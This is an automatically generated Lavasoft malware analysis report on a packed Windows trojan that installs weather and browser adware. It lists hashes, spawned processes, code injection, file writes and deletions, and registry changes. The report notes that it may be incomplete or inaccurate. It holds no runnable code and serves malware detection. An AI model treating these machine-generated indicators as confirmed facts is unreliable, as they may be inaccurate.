Trojan.Win32.Badur.gbfp (Kaspersky), Trojan.Downloader.Hicrazyk.A (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: b8d0ff525ff7e4f2b2c577519665c147
SHA1: aadac4ce2627b4d2d0b80c81b4acf33a8c4bdca0
SHA256: 9875f9087f10b00f5854f1bc9e0e681e8ffa585e5e7ad72e06143a2900730aa2
SSDeep: 24576:mPfB4jcK3yXahZe txE6ZrCcQFLPlVBzXh9BrqY:gyj2a3HEOOcQFLBbzd5
Size: 1237882 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
worldweather.exe:2452
worldWeatherUpdate.5002.exe:2896
365weatherIns_61.exe:408
greendou.exe:772
worldWeatherRealTime5002.exe:2408
The Trojan injects its code into the following process(es):
%original file name%.exe:204
File activity
The process worldweather.exe:2452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (288 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (216 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Program Files%\worldweather\5.0.0.5002\weatherData.tmp (354 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@uujzy[1].txt (139 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\go[1].htm (0 bytes)
The process worldWeatherUpdate.5002.exe:2896 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\369[1].ico (16369 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\PM10Context\PM10Context.db.!mv (835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\PM10Context[1].xml (835 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\AQIContext\AQIContext.db.!mv (365 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\WeatherContext[1].xml (509 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\PM25Context[1].xml (624 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (1196 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sina.com[1].txt (196 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\366.ico.!mv (16369 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\AQIContext[1].xml (365 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\PM25Context\PM25Context.db.!mv (624 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db.!mv (509 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\369.ico.!mv (16369 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\366[1].ico (16369 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db (0 bytes)
The process 365weatherIns_61.exe:408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\System.dll (11 bytes)
%Program Files%\worldweather\5.0.0.5002\PM10.5002.exe (7192 bytes)
%Program Files%\worldweather\5.0.0.5002\weather.db (6584 bytes)
%Program Files%\worldweather\5.0.0.5002\uninst.exe (2251 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\un_update.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\ToggleImages.html (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_move.jpg (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\bg_large.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\btn_next.bmp (2392 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_max.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (80589 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\future\n99.png (6 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\future\tips.ico (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\loading1.bmp (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\tongji_61[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\KillProcDLL.dll (4 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\err.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\checkbox1.bmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\tongji.html (2 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_min.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\inetc.dll (784 bytes)
%Program Files%\worldweather\5.0.0.5002\areacode.db (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\2.jpg (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\btn_close.bmp (1 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (325 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\min.png (440 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\bg.bmp (18424 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\i.gif (170 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\loading.gif (8 bytes)
%Program Files%\worldweather\5.0.0.5002\sqliteApi.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\3.jpg (1552 bytes)
%Program Files%\worldweather\5.0.0.5002\worldWeatherRealTime5002.exe (4992 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\bg_small.png (4 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (325 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\nsWindows.dll (10 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\update.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\worldweather\´óÖÚÌìÆøÃâ€Â¤±¨Ã¶Ãâ€ÂØ.lnk (911 bytes)
%Program Files%\worldweather\5.0.0.5002\worldweather.exe (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\md5dll.dll (8 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\updateRecord.db (1 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\loading.png (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\worldweather\´óÖÚÌìÆøÃâ€Â¤±¨.lnk (943 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\checkbox2.bmp (2 bytes)
%Program Files%\worldweather\5.0.0.5002\AQI.5002.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\loading2.bmp (696 bytes)
%Program Files%\worldweather\5.0.0.5002\WeatherContext\WeatherContext.db (352 bytes)
%Program Files%\worldweather\5.0.0.5002\worldWeatherUpdate.5002.exe (11344 bytes)
%Program Files%\worldweather\5.0.0.5002\sqlite3.dll (20416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\1.jpg (1552 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\large\n99.png (784 bytes)
%Program Files%\worldweather\5.0.0.5002\PM25.5002.exe (11344 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_setting.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp\btn_complete.bmp (2392 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\kz.png (3 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\close.png (873 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\skin.xml (6 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_close.jpg (3 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\topbar.png (3 bytes)
%Program Files%\worldweather\5.0.0.5002\mfc5002.dll (5520 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\updateContext\updateRecord.db (1 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db (352 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\updateContext\AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp (0 bytes)
The process greendou.exe:772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\citydata[2].js (7666 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\skin_[1].css (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\123.sogou[2] (10367 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\guide_tip[1].png (1459 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX6.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\lk_jumei[1].png (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\titlebg[1].png (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\main[1].js (6192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v33_sugg_ajaj_v40_3[2].js (1187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\foot_slider[1].jpg (322 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\ufo2[1].js (17536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140512170407_319[1].jpg (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\DD_belatedPNG_0.0.8a-min[2].js (1208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20130820165531_481[1].gif (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\selogo_111207[1].png (1848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\main[2].js (2605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\skin2_0[1].gif (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20140508103513_537[1].gif (6813 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20140512170546_833[1].jpg (232 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@123.sogou[2].txt (1879 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\skin3[1].gif (1314 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@123.sogou[1].txt (1398 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\fine_cloudy[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\citydata[1].js (7992 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (11568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\_ads_2[2].js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\v53_2icos[1].gif (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\favicon[1].ico (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (774 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\123.sogou[1].htm (7472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\setskinbg[1].gif (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\fbg_about[1].png (805 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\cloudy[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\123.sogou[1] (14016 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\v53_arrow_h[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\v53_123n[2].js (4349 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\img-video-2[1].gif (225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\DD_belatedPNG_0.0.8a-min[1].js (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\get_tj[1].php (1199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140513112717_7[1].jpg (3852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\guide_tip[1].png (2319 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\hotdata[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\skin_tips_n1[1].gif (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@wan.sogou[1].txt (191 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\setting_icon[1].gif (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\rec[1].do (374 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\get_123_v53[1].php (16030 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\subnav_v41[1].png (682 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140512112800_851[1].jpg (2380 bytes)
%Program Files%\greeou\profile\Defaults\last.ini (2306 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\20130531144119_126[1].png (3810 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v53_bicos[1].gif (826 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v33_sugg_ajaj_v40_3[1].js (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\hotdata[2].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\logo_1112293[1].gif (866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\search_arrow[1].gif (447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\i-ico-2b[1].png (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\icon4[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\_ads_2[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\ufo2[2].js (19464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\20140507144656_823[1].jpg (783 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\fIXLig2wT89333[1].jpg (2500 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\selogo_111207[2].png (1606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\selogo_111207[1].png (2008 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\v53_123n[1].js (4851 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\img-news[1].gif (225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\new-ico[1].png (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\1oq9Gg9Y3L8813[1].jpg (1492 bytes)
%Program Files%\greeou\profile\Defaults\config.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\20140507144124_693[1].jpg (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\new-erweima2[1].png (2985 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\v33_sugg_ajaj_v40_3[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\DD_belatedPNG_0.0.8a-min[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@123.sogou[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\hotdata[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@123.sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\_ads_2[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\citydata[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3GJE5WP\main[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\ufo2[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CZABEL6V\v53_123n[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6RMPQHIX\123.sogou[1] (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0PEXU1AN\guide_tip[1].png (0 bytes)
The process %original file name%.exe:204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\processwork.dll (6140 bytes)
%Program Files%\greeou\skin\Default\control\tab_hover.png (346 bytes)
%Program Files%\greeou\skin\Default\control\tab_bg.png (314 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\System.dll (11 bytes)
%Program Files%\greeou\skin\Default\misc\16_ad_hunter.png (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\365weatherIns_61.exe (119257 bytes)
%Program Files%\greeou\profile\Template\start\style.css (3 bytes)
%Program Files%\greeou\skin\Default\control\tab_sidebar.png (321 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_favorites2.png (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Md5dll.dll (8 bytes)
%Program Files%\greeou\skin\Default\control\MenuItem_Hover.png (2 bytes)
%Program Files%\greeou\skin\Default\misc\24_go.png (650 bytes)
%Program Files%\greeou\skin\Default\misc\16_open_in_bg.png (507 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_favorites.png (700 bytes)
%Program Files%\greeou\profile\Defaults\CommandBars.ini (1 bytes)
%Program Files%\greeou\skin\Default\mskin.ini (10 bytes)
%Program Files%\greeou\GreenDou.exe (25123 bytes)
%Program Files%\greeou\skin\Default\control\status_bar_bg.png (445 bytes)
%Program Files%\greeou\skin\Default\control\combo_dropdown_hover.png (774 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward.png (947 bytes)
%Program Files%\greeou\skin\Default\control\win_minimize.png (202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_refresh.png (1 bytes)
%Program Files%\greeou\skin\Default\control\combo_dropdown.png (794 bytes)
%Program Files%\greeou\profile\Template\start\images\logo.gif (3 bytes)
%Program Files%\greeou\skin\Default\control\Button_Pressed.png (1 bytes)
%Program Files%\greeou\profile\Template\start\index.html (832 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_home.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_website_info.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new.png (879 bytes)
%Program Files%\greeou\skin\Default\control\title_bg.png (655 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_home2.png (1 bytes)
%Program Files%\greeou\profile\Template\start\images\header_logo.gif (2 bytes)
%Program Files%\greeou\skin\Default\shared\16_edit.png (646 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back3.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_stop2.png (1 bytes)
%Program Files%\greeou\profile\SearchEngine\config.ini (226 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_new2.png (801 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_page_zoom2.png (724 bytes)
%Program Files%\greeou\profile\Template\start\images\dian.gif (376 bytes)
%Program Files%\greeou\skin\Default\control\win_close.png (362 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_refresh2.png (1 bytes)
%Program Files%\greeou\profile\Template\start\images\header_bg.gif (83 bytes)
%Program Files%\greeou\skin\Default\control\tab_active.png (1 bytes)
%Program Files%\greeou\skin\Default\control\mainframe.png (288 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back2.png (1 bytes)
%Program Files%\greeou\skin\Default\control\tab_inactive.png (281 bytes)
%Program Files%\greeou\skin\Default\control\sidebar_tab_inactive.png (259 bytes)
%Program Files%\greeou\skin\Default\misc\16_folder_open.png (614 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_search.png (871 bytes)
%Program Files%\greeou\skin\Default\control\combosearch_dropdown.png (794 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setup_a7158.exe (354562 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_search2.png (969 bytes)
%Program Files%\greeou\skin\Default\control\win_maximum.png (275 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_new.png (637 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_page_zoom.png (733 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Inetc.dll (20 bytes)
%Program Files%\greeou\skin\Default\control\tab_sidebar_hover.png (322 bytes)
%Program Files%\greeou\skin\Default\control\sidebar_tab_active.png (957 bytes)
%Program Files%\greeou\skin\Default\control\progress.png (708 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back.png (953 bytes)
%Program Files%\greeou\skin\Default\control\combo.png (260 bytes)
%Program Files%\greeou\profile\SearchEngine\google.ico (1 bytes)
%Program Files%\greeou\skin\Default\control\tab_new.png (350 bytes)
%Program Files%\greeou\skin\Default\control\combosearch_dropdown_hover.png (774 bytes)
%Program Files%\greeou\profile\Template\start\left.html (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward2.png (1 bytes)
%Program Files%\greeou\profile\Defaults\config.ini (902 bytes)
%Program Files%\greeou\skin\Default\control\skin_selector.png (283 bytes)
%Program Files%\greeou\skin\Default\control\win_restore.png (302 bytes)
%Program Files%\greeou\skin\Default\control\Button_Checked.png (976 bytes)
%Program Files%\greeou\skin\Default\misc\16_page.png (519 bytes)
%Program Files%\greeou\skin\Default\control\tab_close.png (259 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_history2.png (994 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_undo2.png (840 bytes)
%Program Files%\greeou\skin\Default\control\tab_new_hover.png (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\xID.dll (3 bytes)
%Program Files%\greeou\profile\SearchEngine\taobao.ico (1 bytes)
%Program Files%\greeou\skin\Default\control\Button_Hover.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new2.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_folder_closed.png (587 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_stop.png (1 bytes)
%Program Files%\greeou\skin\Default\shared\16_new.png (650 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Â̶¹ä¯ÀÀÆ÷\Â̶¹ä¯ÀÀÆ÷.lnk (678 bytes)
%Documents and Settings%\%current user%\Desktop\Â̶¹ä¯ÀÀÆ÷.lnk (666 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_history.png (847 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_undo.png (748 bytes)
%Program Files%\greeou\profile\SearchEngine\baidu.ico (2 bytes)
%Program Files%\greeou\skin\Default\misc\24_go2.png (648 bytes)
%Program Files%\greeou\profile\Defaults\last.ini (348 bytes)
%Program Files%\greeou\skin\Default\control\combo_hover.png (261 bytes)
%Program Files%\greeou\skin\Default\control\tab_close_hover.png (2 bytes)
%Program Files%\greeou\profile\Defaults\searchkeys.ini (14 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward3.png (1 bytes)
%Program Files%\greeou\ico\taobao.ico (2104 bytes)
%Program Files%\greeou\skin\Default\misc\16_open_in_new.png (548 bytes)
%Program Files%\greeou\profile\Template\start\images\logo2.gif (596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\nsRandom.dll (935 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1.tmp (0 bytes)
Registry activity
The process worldweather.exe:2452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
